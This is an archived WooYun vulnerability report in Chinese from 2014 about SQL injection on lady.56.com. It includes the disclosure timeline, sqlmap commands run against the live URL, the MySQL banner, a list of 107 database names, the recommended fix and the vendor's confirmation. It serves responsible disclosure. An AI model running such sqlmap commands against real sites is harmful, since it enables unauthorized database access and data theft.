乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-09-30: 细节已通知厂商并且等待厂商处理中 2014-09-30: 厂商已经确认,细节仅向厂商公开 2014-10-10: 细节向核心白帽子及相关领域专家公开 2014-10-20: 细节向普通白帽子公开 2014-10-30: 细节向实习白帽子公开 2014-11-14: 细节向公众公开
涉及107个数据库
未对用户输入正确执行危险字符清理
sqlmap -u "http://lady.56.com/sp/*%20fnj" --dbms=mysql --level=2 --risk=2 --banner
back-end DBMS: MySQL >= 5.0.0banner: '5.5.23-log'
sqlmap -u "http://lady.56.com/sp/*%20fnj" --dbms=mysql --level=2 --risk=2 --dbs
available databases [107]:[*] `56youth`[*] `ask and answer`[*] `hd`caihong_2011`[*] alan[*] ayumi[*] bak_lyhiving[*] btws[*] caihong[*] caihong_60plus[*] caihong_arborday[*] caihong_gongyi[*] channel[*] channel_huodong_2012[*] coco[*] daxiaoyifang[*] disney[*] djyx[*] dvspy[*] end_year_2012[*] endyear2013[*] fcwr2011[*] fun_top[*] games2009[*] girl09[*] guanwang_ayu[*] guanwang_boa[*] guanwang_chris[*] guanwang_david[*] gz2010[*] hd_funny2012[*] hd_gz2010[*] hd_gz2010_photo[*] hd_ndshipin[*] hd_wahaha[*] hd_xzb[*] hd_yulerili_2011[*] heishehui[*] hitea[*] hsm[*] hubei[*] huodong_2012_biye[*] huodong_2012_dreamlist[*] huodong_361[*] huodong_60years[*] huodong_60years_hgh[*] huodong_60years_tv[*] huodong_asia[*] huodong_asia_old[*] huodong_baby_cartoon[*] huodong_baby_cartoon_2010[*] huodong_baby_fengmian[*] huodong_brand[*] huodong_byd[*] huodong_crazysurvival[*] huodong_dlhc[*] huodong_hongren[*] huodong_interview[*] huodong_jiehun[*] huodong_missinter[*] huodong_oscar[*] huodong_paike[*] huodong_qmjs[*] huodong_roc[*] huodong_school[*] huodong_school_visionyouth[*] huodong_szy_2011[*] huodong_tybros[*] huodong_tydr[*] huodong_xgdd[*] huodong_ycsyl[*] huodong_ycsyl_syl2012[*] huodong_zbc[*] huodong_zgzqy_2013[*] huodong_zjh[*] information_schema[*] jiemu[*] melon_wp[*] mothersday[*] music_best[*] mxyh[*] mysql[*] mystyle[*] new_mm[*] new_spec_sys[*] olympic_2012[*] paike[*] performance_schema[*] shanliang[*] she[*] special[*] super[*] tb2014[*] tellstory[*] test[*] topic[*] topmusic[*] uaction_video[*] weekly[*] world_cup_2010[*] worldcup_game[*] xing[*] xy[*] ycsyl2014[*] yeah[*] yyj[*] zhibo[*] zyhl
参数化SQL语句
危害等级:中
漏洞Rank:5
确认时间:2014-09-30 15:02
确认
2014-09-30:fixed